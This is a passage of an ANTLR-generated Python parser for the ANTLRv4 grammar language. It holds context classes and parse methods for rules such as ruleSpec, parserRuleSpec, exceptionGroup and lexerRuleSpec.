return self.getToken(ANTLRv4Parser.SEMI, 0)
def lexerRuleSpec(self, i:int=None):
if i is None:
return self.getTypedRuleContexts(ANTLRv4Parser.LexerRuleSpecContext)
else:
return self.getTypedRuleContext(ANTLRv4Parser.LexerRuleSpecContext,i)
def getRuleIndex(self):
return ANTLRv4Parser.RULE_modeSpec
def enterRule(self, listener:ParseTreeListener):
if hasattr( listener, "enterModeSpec" ):
listener.enterModeSpec(self)
def exitRule(self, listener:ParseTreeListener):
if hasattr( listener, "exitModeSpec" ):
listener.exitModeSpec(self)
def accept(self, visitor:ParseTreeVisitor):
if hasattr( visitor, "visitModeSpec" ):
return visitor.visitModeSpec(self)
else:
return visitor.visitChildren(self)
def modeSpec(self):
localctx = ANTLRv4Parser.ModeSpecContext(self, self._ctx, self.state)
self.enterRule(localctx, 30, self.RULE_modeSpec)
self._la = 0 # Token type
try:
self.enterOuterAlt(localctx, 1)
self.state = 256
self.match(ANTLRv4Parser.MODE)
self.state = 257
self.identifier()
self.state = 258
self.match(ANTLRv4Parser.SEMI)
self.state = 262
self._errHandler.sync(self)
_la = self._input.LA(1)
while (((_la) & ~0x3f) == 0 and ((1 << _la) & ((1 << ANTLRv4Parser.TOKEN_REF) | (1 << ANTLRv4Parser.DOC_COMMENT) | (1 << ANTLRv4Parser.FRAGMENT))) != 0):
self.state = 259
self.lexerRuleSpec()
self.state = 264
self._errHandler.sync(self)
_la = self._input.LA(1)
except RecognitionException as re:
localctx.exception = re
self._errHandler.reportError(self, re)
self._errHandler.recover(self, re)
finally:
self.exitRule()
return localctx
class RulesContext(ParserRuleContext):
def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):
super().__init__(parent, invokingState)
self.parser = parser
def ruleSpec(self, i:int=None):
if i is None:
return self.getTypedRuleContexts(ANTLRv4Parser.RuleSpecContext)
else:
return self.getTypedRuleContext(ANTLRv4Parser.RuleSpecContext,i)
def getRuleIndex(self):
return ANTLRv4Parser.RULE_rules
def enterRule(self, listener:ParseTreeListener):
if hasattr( listener, "enterRules" ):
listener.enterRules(self)
def exitRule(self, listener:ParseTreeListener):
if hasattr( listener, "exitRules" ):
listener.exitRules(self)
def accept(self, visitor:ParseTreeVisitor):
if hasattr( visitor, "visitRules" ):
return visitor.visitRules(self)
else:
return visitor.visitChildren(self)
def rules(self):
localctx = ANTLRv4Parser.RulesContext(self, self._ctx, self.state)
self.enterRule(localctx, 32, self.RULE_rules)
self._la = 0 # Token type
try:
self.enterOuterAlt(localctx, 1)
self.state = 268
self._errHandler.sync(self)
_la = self._input.LA(1)
while (((_la) & ~0x3f) == 0 and ((1 << _la) & ((1 << ANTLRv4Parser.TOKEN_REF) | (1 << ANTLRv4Parser.RULE_REF) | (1 << ANTLRv4Parser.DOC_COMMENT) | (1 << ANTLRv4Parser.HEADER) | (1 << ANTLRv4Parser.FRAGMENT) | (1 << ANTLRv4Parser.PROTECTED) | (1 << ANTLRv4Parser.PUBLIC) | (1 << ANTLRv4Parser.PRIVATE))) != 0):
self.state = 265
self.ruleSpec()
self.state = 270
self._errHandler.sync(self)
_la = self._input.LA(1)
except RecognitionException as re:
localctx.exception = re
self._errHandler.reportError(self, re)
self._errHandler.recover(self, re)
finally:
self.exitRule()
return localctx
class RuleSpecContext(ParserRuleContext):
def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):
super().__init__(parent, invokingState)
self.parser = parser
self._HEADER = None # Token
self.headers = list() # of Tokens
def parserRuleSpec(self):
return self.getTypedRuleContext(ANTLRv4Parser.ParserRuleSpecContext,0)
def lexerRuleSpec(self):
return self.getTypedRuleContext(ANTLRv4Parser.LexerRuleSpecContext,0)
def HEADER(self, i:int=None):
if i is None:
return self.getTokens(ANTLRv4Parser.HEADER)
else:
return self.getToken(ANTLRv4Parser.HEADER, i)
def getRuleIndex(self):
return ANTLRv4Parser.RULE_ruleSpec
def enterRule(self, listener:ParseTreeListener):
if hasattr( listener, "enterRuleSpec" ):
listener.enterRuleSpec(self)
def exitRule(self, listener:ParseTreeListener):
if hasattr( listener, "exitRuleSpec" ):
listener.exitRuleSpec(self)
def accept(self, visitor:ParseTreeVisitor):
if hasattr( visitor, "visitRuleSpec" ):
return visitor.visitRuleSpec(self)
else:
return visitor.visitChildren(self)
def ruleSpec(self):
localctx = ANTLRv4Parser.RuleSpecContext(self, self._ctx, self.state)
self.enterRule(localctx, 34, self.RULE_ruleSpec)
self._la = 0 # Token type
try:
self.enterOuterAlt(localctx, 1)
self.state = 274
self._errHandler.sync(self)
_la = self._input.LA(1)
while _la==ANTLRv4Parser.HEADER:
self.state = 271
localctx._HEADER = self.match(ANTLRv4Parser.HEADER)
localctx.headers.append(localctx._HEADER)
self.state = 276
self._errHandler.sync(self)
_la = self._input.LA(1)
self.state = 279
self._errHandler.sync(self)
la_ = self._interp.adaptivePredict(self._input,20,self._ctx)
if la_ == 1:
self.state = 277
self.parserRuleSpec()
pass
elif la_ == 2:
self.state = 278
self.lexerRuleSpec()
pass
except RecognitionException as re:
localctx.exception = re
self._errHandler.reportError(self, re)
self._errHandler.recover(self, re)
finally:
self.exitRule()
return localctx
class ParserRuleSpecContext(ParserRuleContext):
def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):
super().__init__(parent, invokingState)
self.parser = parser
self._DOC_COMMENT = None # Token
self.docs = list() # of Tokens
self.name = None # Token
def COLON(self):
return self.getToken(ANTLRv4Parser.COLON, 0)
def ruleBlock(self):
return self.getTypedRuleContext(ANTLRv4Parser.RuleBlockContext,0)
def SEMI(self):
return self.getToken(ANTLRv4Parser.SEMI, 0)
def exceptionGroup(self):
return self.getTypedRuleContext(ANTLRv4Parser.ExceptionGroupContext,0)
def RULE_REF(self):
return self.getToken(ANTLRv4Parser.RULE_REF, 0)
def ruleModifiers(self):
return self.getTypedRuleContext(ANTLRv4Parser.RuleModifiersContext,0)
def argActionBlock(self):
return self.getTypedRuleContext(ANTLRv4Parser.ArgActionBlockContext,0)
def ruleReturns(self):
return self.getTypedRuleContext(ANTLRv4Parser.RuleReturnsContext,0)
def throwsSpec(self):
return self.getTypedRuleContext(ANTLRv4Parser.ThrowsSpecContext,0)
def localsSpec(self):
return self.getTypedRuleContext(ANTLRv4Parser.LocalsSpecContext,0)
def rulePrequel(self, i:int=None):
if i is None:
return self.getTypedRuleContexts(ANTLRv4Parser.RulePrequelContext)
else:
return self.getTypedRuleContext(ANTLRv4Parser.RulePrequelContext,i)
def DOC_COMMENT(self, i:int=None):
if i is None:
return self.getTokens(ANTLRv4Parser.DOC_COMMENT)
else:
return self.getToken(ANTLRv4Parser.DOC_COMMENT, i)
def getRuleIndex(self):
return ANTLRv4Parser.RULE_parserRuleSpec
def enterRule(self, listener:ParseTreeListener):
if hasattr( listener, "enterParserRuleSpec" ):
listener.enterParserRuleSpec(self)
def exitRule(self, listener:ParseTreeListener):
if hasattr( listener, "exitParserRuleSpec" ):
listener.exitParserRuleSpec(self)
def accept(self, visitor:ParseTreeVisitor):
if hasattr( visitor, "visitParserRuleSpec" ):
return visitor.visitParserRuleSpec(self)
else:
return visitor.visitChildren(self)
def parserRuleSpec(self):
localctx = ANTLRv4Parser.ParserRuleSpecContext(self, self._ctx, self.state)
self.enterRule(localctx, 36, self.RULE_parserRuleSpec)
self._la = 0 # Token type
try:
self.enterOuterAlt(localctx, 1)
self.state = 284
self._errHandler.sync(self)
_la = self._input.LA(1)
while _la==ANTLRv4Parser.DOC_COMMENT:
self.state = 281
localctx._DOC_COMMENT = self.match(ANTLRv4Parser.DOC_COMMENT)
localctx.docs.append(localctx._DOC_COMMENT)
self.state = 286
self._errHandler.sync(self)
_la = self._input.LA(1)
self.state = 288
self._errHandler.sync(self)
_la = self._input.LA(1)
if (((_la) & ~0x3f) == 0 and ((1 << _la) & ((1 << ANTLRv4Parser.FRAGMENT) | (1 << ANTLRv4Parser.PROTECTED) | (1 << ANTLRv4Parser.PUBLIC) | (1 << ANTLRv4Parser.PRIVATE))) != 0):
self.state = 287
self.ruleModifiers()
self.state = 290
localctx.name = self.match(ANTLRv4Parser.RULE_REF)
self.state = 292
self._errHandler.sync(self)
_la = self._input.LA(1)
if _la==ANTLRv4Parser.BEGIN_ARGUMENT:
self.state = 291
self.argActionBlock()
self.state = 295
self._errHandler.sync(self)
_la = self._input.LA(1)
if _la==ANTLRv4Parser.RETURNS:
self.state = 294
self.ruleReturns()
self.state = 298
self._errHandler.sync(self)
_la = self._input.LA(1)
if _la==ANTLRv4Parser.THROWS:
self.state = 297
self.throwsSpec()
self.state = 301
self._errHandler.sync(self)
_la = self._input.LA(1)
if _la==ANTLRv4Parser.LOCALS:
self.state = 300
self.localsSpec()
self.state = 306
self._errHandler.sync(self)
_la = self._input.LA(1)
while _la==ANTLRv4Parser.OPTIONS or _la==ANTLRv4Parser.AT:
self.state = 303
self.rulePrequel()
self.state = 308
self._errHandler.sync(self)
_la = self._input.LA(1)
self.state = 309
self.match(ANTLRv4Parser.COLON)
self.state = 310
self.ruleBlock()
self.state = 311
self.match(ANTLRv4Parser.SEMI)
self.state = 312
self.exceptionGroup()
except RecognitionException as re:
localctx.exception = re
self._errHandler.reportError(self, re)
self._errHandler.recover(self, re)
finally:
self.exitRule()
return localctx
class ExceptionGroupContext(ParserRuleContext):
def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):
super().__init__(parent, invokingState)
self.parser = parser
def exceptionHandler(self, i:int=None):
if i is None:
return self.getTypedRuleContexts(ANTLRv4Parser.ExceptionHandlerContext)
else:
return self.getTypedRuleContext(ANTLRv4Parser.ExceptionHandlerContext,i)
def finallyClause(self):
return self.getTypedRuleContext(ANTLRv4Parser.FinallyClauseContext,0)
def getRuleIndex(self):
return ANTLRv4Parser.RULE_exceptionGroup
def enterRule(self, listener:ParseTreeListener):
if hasattr( listener, "enterExceptionGroup" ):
listener.enterExceptionGroup(self)
def exitRule(self, listener:ParseTreeListener):
if hasattr( listener, "exitExceptionGroup" ):
listener.exitExceptionGroup(self)
def accept(self, visitor:ParseTreeVisitor):
if hasattr( visitor, "visitExceptionGroup" ):
return visitor.visitExceptionGroup(self)
else:
return visitor.visitChildren(self)
def exceptionGroup(self):
localctx = ANTLRv4Parser.ExceptionGroupContext(self, self._ctx, self.state)
self.enterRule(localctx, 38, self.RULE_exceptionGroup)
self._la = 0 # Token type
try:
self.enterOuterAlt(localctx, 1)
self.state = 317
self._errHandler.sync(self)
_la = self._input.LA(1)
while _la==ANTLRv4Parser.CATCH:
self.state = 314
self.exceptionHandler()
self.state = 319
self._errHandler.sync(self)
_la = self._input.LA(1)
self.state = 321
self._errHandler.sync(self)
_la = self._input.LA(1)
if _la==ANTLRv4Parser.FINALLY:
self.state = 320
self.finallyClause()
except RecognitionException as re:
localctx.exception = re
self._errHandler.reportError(self, re)
self._errHandler.recover(self, re)
finally:
self.exitRule()
return localctx
class ExceptionHandlerContext(ParserRuleContext):
def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):
super().__init__(parent, invokingState)
self.parser = parser
def CATCH(self):
return self.getToken(ANTLRv4Parser.CATCH, 0)
def argActionBlock(self):
return self.getTypedRuleContext(ANTLRv4Parser.ArgActionBlockContext,0)
def actionBlock(self):
return self.getTypedRuleContext(ANTLRv4Parser.ActionBlockContext,0)
def getRuleIndex(self):
return ANTLRv4Parser.RULE_exceptionHandler
def enterRule(self, listener:ParseTreeListener):
if hasattr( listener, "enterExceptionHandler" ):
listener.enterExceptionHandler(self)
def exitRule(self, listener:ParseTreeListener):
if hasattr( listener, "exitExceptionHandler" ):
listener.exitExceptionHandler(self)
def accept(self, visitor:ParseTreeVisitor):
if hasattr( visitor, "visitExceptionHandler" ):
return visitor.visitExceptionHandler(self)
else:
return visitor.visitChildren(self)
def exceptionHandler(self):
localctx = ANTLRv4Parser.ExceptionHandlerContext(self, self._ctx, self.state)
self.enterRule(localctx, 40, self.RULE_exceptionHandler)
try:
self.enterOuterAlt(localctx, 1)
self.state = 323
self.match(ANTLRv4Parser.CATCH)
self.state = 324
self.argActionBlock()
self.state = 325
self.actionBlock()
except RecognitionException as re:
localctx.exception = re
self._errHandler.reportError(self, re)
self._errHandler.recover(self, re)
finally:
self.exitRule()
return localctx
class FinallyClauseContext(ParserRuleContext):
def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):
super().__init__(parent, invokingState)
self.parser = parser
def FINALLY(self):
return self.getToken(ANTLRv4Parser.FINALLY, 0)
def actionBlock(self):
return self.getTypedRuleContext(ANTLRv4Parser.ActionBlockContext,0)
def getRuleIndex(self):
return ANTLRv4Parser.RULE_finallyClause
def enterRule(self, listener:ParseTreeListener):
if hasattr( listener, "enterFinallyClause" ):
listener.enterFinallyClause(self)
def exitRule(self, listener:ParseTreeListener):
if hasattr( listener, "exitFinallyClause" ):
listener.exitFinallyClause(self)
def accept(self, visitor:ParseTreeVisitor):
if hasattr( visitor, "visitFinallyClause" ):
return visitor.visitFinallyClause(self)
else:
return visitor.visitChildren(self)
def finallyClause(self):
localctx = ANTLRv4Parser.FinallyClauseContext(self, self._ctx, self.state)
self.enterRule(localctx, 42, self.RULE_finallyClause)
try:
self.enterOuterAlt(localctx, 1)
self.state = 327
self.match(ANTLRv4Parser.FINALLY)
self.state = 328
self.actionBlock()
except RecognitionException as re:
localctx.exception = re
self._errHandler.reportError(self, re)
self._errHandler.recover(self, re)
finally:
self.exitRule()
return localctx
class RulePrequelContext(ParserRuleContext):
def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):
super().__init__(parent, invokingState)
self.parser = parser
def optionsSpec(self):
return self.getTypedRuleContext(ANTLRv4Parser.OptionsSpecContext,0)
def ruleAction(self):
return self.getTypedRuleContext(ANTLRv4Parser.RuleActionContext,0)
def getRuleIndex(self):
return ANTLRv4Parser.RULE_rulePrequel
def enterRule(self, listener:ParseTreeListener):
if hasattr( listener, "enterRulePrequel" ):
listener.enterRulePrequel(self)
def exitRule(self, listener:ParseTreeListener):
if hasattr( listener, "exitRulePrequel" ):
listener.exitRulePrequel(self)
def accept(self, visitor:ParseTreeVisitor):
if hasattr( visitor, "visitRulePrequel" ):
return visitor.visitRulePrequel(self)
else:
return visitor.visitChildren(self)
def rulePrequel(self):
localctx = ANTLRv4Parser.RulePrequelContext(self, self._ctx, self.state)
self.enterRule(localctx, 44, self.RULE_rulePrequel)
try:
self.state = 332
self._errHandler.sync(self)
token = self._input.LA(1)
if token in [ANTLRv4Parser.OPTIONS]:
self.enterOuterAlt(localctx, 1)
self.state = 330
self.optionsSpec()
pass
elif token in [ANTLRv4Parser.AT]:
self.enterOuterAlt(localctx, 2)
self.state = 331
self.ruleAction()
pass
else:
raise NoViableAltException(self)
except RecognitionException as re:
localctx.exception = re
self._errHandler.reportError(self, re)
self._errHandler.recover(self, re)
finally:
self.exitRule()
return localctx
class RuleReturnsContext(ParserRuleContext):
def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):
super().__init__(parent, invokingState)
self.parser = parser
def RETURNS(self):
return self.getToken(ANTLRv4Parser.RETURNS, 0)
def argActionBlock(self):
return self.getTypedRuleContext(ANTLRv4Parser.ArgActionBlockContext,0)
def getRuleIndex(self):
return ANTLRv4Parser.RULE_ruleReturns
def enterRule(self, listener:ParseTreeListener):
if hasattr( listener, "enterRuleReturns" ):
listener.enterRuleReturns(self)
def exitRule(self, listener:ParseTreeListener):
if hasattr( listener, "exitRuleReturns" ):
listener.exitRuleReturns(self)
def accept(self, visitor:ParseTreeVisitor):
if hasattr( visitor, "visitRuleReturns" ):
return visitor.visitRuleReturns(self)
else:
return visitor.visitChildren(self)
def ruleReturns(self):
localctx = ANTLRv4Parser.RuleReturnsContext(self, self._ctx, self.state)
self.enterRule(localctx, 46, self.RULE_ruleReturns)
try:
self.enterOuterAlt(localctx, 1)
self.state = 334
self.match(ANTLRv4Parser.RETURNS)
self.state = 335
self.argActionBlock()
except RecognitionException as re:
localctx.exception = re
self._errHandler.reportError(self, re)
self._errHandler.recover(self, re)
finally:
self.exitRule()
return localctx
class ThrowsSpecContext(ParserRuleContext):
def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):
super().__init__(parent, invokingState)
self.parser = parser
def THROWS(self):
return self.getToken(ANTLRv4Parser.THROWS, 0)
def identifier(self, i:int=None):
if i is None:
return self.getTypedRuleContexts(ANTLRv4Parser.IdentifierContext)
else:
return self.getTypedRuleContext(ANTLRv4Parser.IdentifierContext,i)
def COMMA(self, i:int=None):
if i is None:
return self.getTokens(ANTLRv4Parser.COMMA)
else:
return self.getToken(ANTLRv4Parser.COMMA, i)
def getRuleIndex(self):
return ANTLRv4Parser.RULE_throwsSpec
def enterRule(self, listener:ParseTreeListener):
if hasattr( listener, "enterThrowsSpec" ):
listener.enterThrowsSpec(self)
def exitRule(self, listener:ParseTreeListener):
if hasattr( listener, "exitThrowsSpec" ):
listener.exitThrowsSpec(self)
def accept(self, visitor:ParseTreeVisitor):
if hasattr( visitor, "visitThrowsSpec" ):
return visitor.visitThrowsSpec(self)
else:
return visitor.visitChildren(self)
def throwsSpec(self):
localctx = ANTLRv4Parser.ThrowsSpecContext(self, self._ctx, self.state)
self.enterRule(localctx, 48, self.RULE_throwsSpec)
self._la = 0 # Token type
try:
self.enterOuterAlt(localctx, 1)
self.state = 337
self.match(ANTLRv4Parser.THROWS)
self.state = 338
self.identifier()
self.state = 343
self._errHandler.sync(self)
_la = self._input.LA(1)
while _la==ANTLRv4Parser.COMMA:
self.state = 339
self.match(ANTLRv4Parser.COMMA)
self.state = 340
self.identifier()
self.state = 345
self._errHandler.sync(self)
_la = self._input.LA(1)
except RecognitionException as re:
localctx.exception = re
self._errHandler.reportError(self, re)
self._errHandler.recover(self, re)
finally:
self.exitRule()
return localctx
class LocalsSpecContext(ParserRuleContext):
def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):
super().__init__(parent, invokingState)
self.parser = parser
def LOCALS(self):
return self.getToken(ANTLRv4Parser.LOCALS, 0)
def argActionBlock(self):
return self.getTypedRuleContext(ANTLRv4Parser.ArgActionBlockContext,0)
def getRuleIndex(self):
return ANTLRv4Parser.RULE_localsSpec
def enterRule(self, listener:ParseTreeListener):
if hasattr( listener, "enterLocalsSpec" ):
listener.enterLocalsSpec(self)
def exitRule(self, listener:ParseTreeListener):
if hasattr( listener, "exitLocalsSpec" ):
listener.exitLocalsSpec(self)
def accept(self, visitor:ParseTreeVisitor):
if hasattr( visitor, "visitLocalsSpec" ):
return visitor.visitLocalsSpec(self)
else:
return visitor.visitChildren(self)
def localsSpec(self):
localctx = ANTLRv4Parser.LocalsSpecContext(self, self._ctx, self.state)
self.enterRule(localctx, 50, self.RULE_localsSpec)
try:
self.enterOuterAlt(localctx, 1)
self.state = 346
self.match(ANTLRv4Parser.LOCALS)
self.state = 347
self.argActionBlock()
except RecognitionException as re:
localctx.exception = re
self._errHandler.reportError(self, re)
self._errHandler.recover(self, re)
finally:
self.exitRule()
return localctx
class RuleActionContext(ParserRuleContext):
def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):
super().__init__(parent, invokingState)
self.parser = parser
def AT(self):
return self.getToken(ANTLRv4Parser.AT, 0)
def identifier(self):
return self.getTypedRuleContext(ANTLRv4Parser.IdentifierContext,0)
def actionBlock(self):
return self.getTypedRuleContext(ANTLRv4Parser.ActionBlockContext,0)
def getRuleIndex(self):
return ANTLRv4Parser.RULE_ruleAction
def enterRule(self, listener:ParseTreeListener):
if hasattr( listener, "enterRuleAction" ):
listener.enterRuleAction(self)
def exitRule(self, listener:ParseTreeListener):
if hasattr( listener, "exitRuleAction" ):
listener.exitRuleAction(self)
def accept(self, visitor:ParseTreeVisitor):
if hasattr( visitor, "visitRuleAction" ):
return visitor.visitRuleAction(self)
else:
return visitor.visitChildren(self)
def ruleAction(self):
localctx = ANTLRv4Parser.RuleActionContext(self, self._ctx, self.state)
self.enterRule(localctx, 52, self.RULE_ruleAction)
try:
self.enterOuterAlt(localctx, 1)
self.state = 349
self.match(ANTLRv4Parser.AT)
self.state = 350
self.identifier()
self.state = 351
self.actionBlock()
except RecognitionException as re:
localctx.exception = re
self._errHandler.reportError(self, re)
self._errHandler.recover(self, re)
finally:
self.exitRule()
return localctx
class RuleModifiersContext(ParserRuleContext):
def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):
super().__init__(parent, invokingState)
self.parser = parser
def ruleModifier(self, i:int=None):
if i is None:
return self.getTypedRuleContexts(ANTLRv4Parser.RuleModifierContext)
else:
return self.getTypedRuleContext(ANTLRv4Parser.RuleModifierContext,i)
def getRuleIndex(self):
return ANTLRv4Parser.RULE_ruleModifiers
def enterRule(self, listener:ParseTreeListener):
if hasattr( listener, "enterRuleModifiers" ):
listener.enterRuleModifiers(self)
def exitRule(self, listener:ParseTreeListener):
if hasattr( listener, "exitRuleModifiers" ):
listener.exitRuleModifiers(self)
def accept(self, visitor:ParseTreeVisitor):
if hasattr( visitor, "visitRuleModifiers" ):
return visitor.visitRuleModifiers(self)
else:
return visitor.visitChildren(self)
def ruleModifiers(self):
localctx = ANTLRv4Parser.RuleModifiersContext(self, self._ctx, self.state)
self.enterRule(localctx, 54, self.RULE_ruleModifiers)
self._la = 0 # Token type
try:
self.enterOuterAlt(localctx, 1)
self.state = 354
self._errHandler.sync(self)
_la = self._input.LA(1)
while True:
self.state = 353
self.ruleModifier()
self.state = 356
self._errHandler.sync(self)
_la = self._input.LA(1)
if not ((((_la) & ~0x3f) == 0 and ((1 << _la) & ((1 << ANTLRv4Parser.FRAGMENT) | (1 << ANTLRv4Parser.PROTECTED) | (1 << ANTLRv4Parser.PUBLIC) | (1 << ANTLRv4Parser.PRIVATE))) != 0)):
break
except RecognitionException as re:
localctx.exception = re
self._errHandler.reportError(self, re)
self._errHandler.recover(self, re)
finally:
self.exitRule()
return localctx
class RuleModifierContext(ParserRuleContext):
def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):
super().__init__(parent, invokingState)
self.parser = parser
def PUBLIC(self):
return self.getToken(ANTLRv4Parser.PUBLIC, 0)
def PRIVATE(self):
return self.getToken(ANTLRv4Parser.PRIVATE, 0)
def PROTECTED(self):
return self.getToken(ANTLRv4Parser.PROTECTED, 0)
def FRAGMENT(self):
return self.getToken(ANTLRv4Parser.FRAGMENT, 0)
def getRuleIndex(self):
return ANTLRv4Parser.RULE_ruleModifier
def enterRule(self, listener:ParseTreeListener):
if hasattr( listener, "enterRuleModifier" ):
listener.enterRuleModifier(self)
def exitRule(self, listener:ParseTreeListener):
if hasattr( listener, "exitRuleModifier" ):
listener.exitRuleModifier(self)
def accept(self, visitor:ParseTreeVisitor):
if hasattr( visitor, "visitRuleModifier" ):
return visitor.visitRuleModifier(self)
else:
return visitor.visitChildren(self)
def ruleModifier(self):
localctx = ANTLRv4Parser.RuleModifierContext(self, self._ctx, self.state)
self.enterRule(localctx, 56, self.RULE_ruleModifier)
self._la = 0 # Token type
try:
self.enterOuterAlt(localctx, 1)
self.state = 358
_la = self._input.LA(1)
if not((((_la) & ~0x3f) == 0 and ((1 << _la) & ((1 << ANTLRv4Parser.FRAGMENT) | (1 << ANTLRv4Parser.PROTECTED) | (1 << ANTLRv4Parser.PUBLIC) | (1 << ANTLRv4Parser.PRIVATE))) != 0)):
self._errHandler.recoverInline(self)
else:
self._errHandler.reportMatch(self)
self.consume()
except RecognitionException as re:
localctx.exception = re
self._errHandler.reportError(self, re)
self._errHandler.recover(self, re)
finally:
self.exitRule()
return localctx
class RuleBlockContext(ParserRuleContext):
def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):
super().__init__(parent, invokingState)
self.parser = parser
def ruleAltList(self):
return self.getTypedRuleContext(ANTLRv4Parser.RuleAltListContext,0)
def getRuleIndex(self):
return ANTLRv4Parser.RULE_ruleBlock
def enterRule(self, listener:ParseTreeListener):
if hasattr( listener, "enterRuleBlock" ):
listener.enterRuleBlock(self)
def exitRule(self, listener:ParseTreeListener):
if hasattr( listener, "exitRuleBlock" ):
listener.exitRuleBlock(self)
def accept(self, visitor:ParseTreeVisitor):
if hasattr( visitor, "visitRuleBlock" ):
return visitor.visitRuleBlock(self)
else:
return visitor.visitChildren(self)
def ruleBlock(self):
localctx = ANTLRv4Parser.RuleBlockContext(self, self._ctx, self.state)
self.enterRule(localctx, 58, self.RULE_ruleBlock)
try:
self.enterOuterAlt(localctx, 1)
self.state = 360
self.ruleAltList()
except RecognitionException as re:
localctx.exception = re
self._errHandler.reportError(self, re)
self._errHandler.recover(self, re)
finally:
self.exitRule()
return localctx
class RuleAltListContext(ParserRuleContext):
def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):
super().__init__(parent, invokingState)
self.parser = parser
self._labeledAlt = None # LabeledAltContext
self.alts = list() # of LabeledAltContexts
def labeledAlt(self, i:int=None):
if i is None:
return self.getTypedRuleContexts(ANTLRv4Parser.LabeledAltContext)
else:
return self.getTypedRuleContext(ANTLRv4Parser.LabeledAltContext,i)
def OR(self, i:int=None):
if i is None:
return self.getTokens(ANTLRv4Parser.OR)
else:
return self.getToken(ANTLRv4Parser.OR, i)
def getRuleIndex(self):
return ANTLRv4Parser.RULE_ruleAltList
def enterRule(self, listener:ParseTreeListener):
if hasattr( listener, "enterRuleAltList" ):
listener.enterRuleAltList(self)
def exitRule(self, listener:ParseTreeListener):
if hasattr( listener, "exitRuleAltList" ):
listener.exitRuleAltList(self)
def accept(self, visitor:ParseTreeVisitor):
if hasattr( visitor, "visitRuleAltList" ):
return visitor.visitRuleAltList(self)
else:
return visitor.visitChildren(self)
def ruleAltList(self):
localctx = ANTLRv4Parser.RuleAltListContext(self, self._ctx, self.state)
self.enterRule(localctx, 60, self.RULE_ruleAltList)
self._la = 0 # Token type
try:
self.enterOuterAlt(localctx, 1)
self.state = 362
localctx._labeledAlt = self.labeledAlt()
localctx.alts.append(localctx._labeledAlt)
self.state = 367
self._errHandler.sync(self)
_la = self._input.LA(1)
while _la==ANTLRv4Parser.OR:
self.state = 363
self.match(ANTLRv4Parser.OR)
self.state = 364
localctx._labeledAlt = self.labeledAlt()
localctx.alts.append(localctx._labeledAlt)
self.state = 369
self._errHandler.sync(self)
_la = self._input.LA(1)
except RecognitionException as re:
localctx.exception = re
self._errHandler.reportError(self, re)
self._errHandler.recover(self, re)
finally:
self.exitRule()
return localctx
class LabeledAltContext(ParserRuleContext):
def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):
super().__init__(parent, invokingState)
self.parser = parser
def alternative(self):
return self.getTypedRuleContext(ANTLRv4Parser.AlternativeContext,0)
def POUND(self):
return self.getToken(ANTLRv4Parser.POUND, 0)
def identifier(self):
return self.getTypedRuleContext(ANTLRv4Parser.IdentifierContext,0)
def getRuleIndex(self):
return ANTLRv4Parser.RULE_labeledAlt
def enterRule(self, listener:ParseTreeListener):
if hasattr( listener, "enterLabeledAlt" ):
listener.enterLabeledAlt(self)
def exitRule(self, listener:ParseTreeListener):
if hasattr( listener, "exitLabeledAlt" ):
listener.exitLabeledAlt(self)
def accept(self, visitor:ParseTreeVisitor):
if hasattr( visitor, "visitLabeledAlt" ):
return visitor.visitLabeledAlt(self)
else:
return visitor.visitChildren(self)
def labeledAlt(self):
localctx = ANTLRv4Parser.LabeledAltContext(self, self._ctx, self.state)
self.enterRule(localctx, 62, self.RULE_labeledAlt)
self._la = 0 # Token type
try:
self.enterOuterAlt(localctx, 1)
self.state = 370
self.alternative()
self.state = 373
self._errHandler.sync(self)
_la = self._input.LA(1)
if _la==ANTLRv4Parser.POUND:
self.state = 371
self.match(ANTLRv4Parser.POUND)
self.state = 372
self.identifier()
except RecognitionException as re:
localctx.exception = re
self._errHandler.reportError(self, re)
self._errHandler.recover(self, re)
finally:
self.exitRule()
return localctx
class LexerRuleSpecContext(ParserRuleContext):
def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):
super().__init__(parent, invokingState)
self.parser = parser
self._DOC_COMMENT = None # Token
self.docs = list() # of Tokens
self.frag = None # Token
self.name = None # Token
def COLON(self):
return self.getToken(ANTLRv4Parser.COLON, 0)
def lexerRuleBlock(self):
return self.getTypedRuleContext(ANTLRv4Parser.LexerRuleBlockContext,0)
def SEMI(self):
return self.getToken(ANTLRv4Parser.SEMI, 0)
def TOKEN_REF(self):
return self.getToken(ANTLRv4Parser.TOKEN_REF, 0)
def DOC_COMMENT(self, i:int=None):
if i is None:
return self.getTokens(ANTLRv4Parser.DOC_COMMENT)
else:
return self.getToken(ANTLRv4Parser.DOC_COMMENT, i)
def FRAGMENT(self):
return self.getToken(ANTLRv4Parser.FRAGMENT, 0)
def getRuleIndex(self):
return ANTLRv4Parser.RULE_lexerRuleSpec
def enterRule(self, listener:ParseTreeListener):
if hasattr( listener, "enterLexerRuleSpec" ):
listener.enterLexerRuleSpec(self)
def exitRule(self, listener:ParseTreeListener):
if hasattr( listener, "exitLexerRuleSpec" ):
listener.exitLexerRuleSpec(self)
def accept(self, visitor:ParseTreeVisitor):
if hasattr( visitor, "visitLexerRuleSpec" ):
return visitor.visitLexerRuleSpec(self)
else:
return visitor.visitChildren(self)
def lexerRuleSpec(self):
localctx = ANTLRv4Parser.LexerRuleSpecContext(self, self._ctx, self.state)
self.enterRule(localctx, 64, self.RULE_lexerRuleSpec)
self._la = 0 # Token type
try:
self.enterOuterAlt(localctx, 1)
self.state = 378
self._errHandler.sync(self)
_la = self._input.LA(1)
while _la==ANTLRv4Parser.DOC_COMMENT:
self.state = 375
localctx._DOC_COMMENT = self.match(ANTLRv4Parser.DOC_COMMENT)
localctx.docs.append(localctx._DOC_COMMENT)
self.state = 380
self._errHandler.sync(self)
_la = self._input.LA(1)
self.state = 382
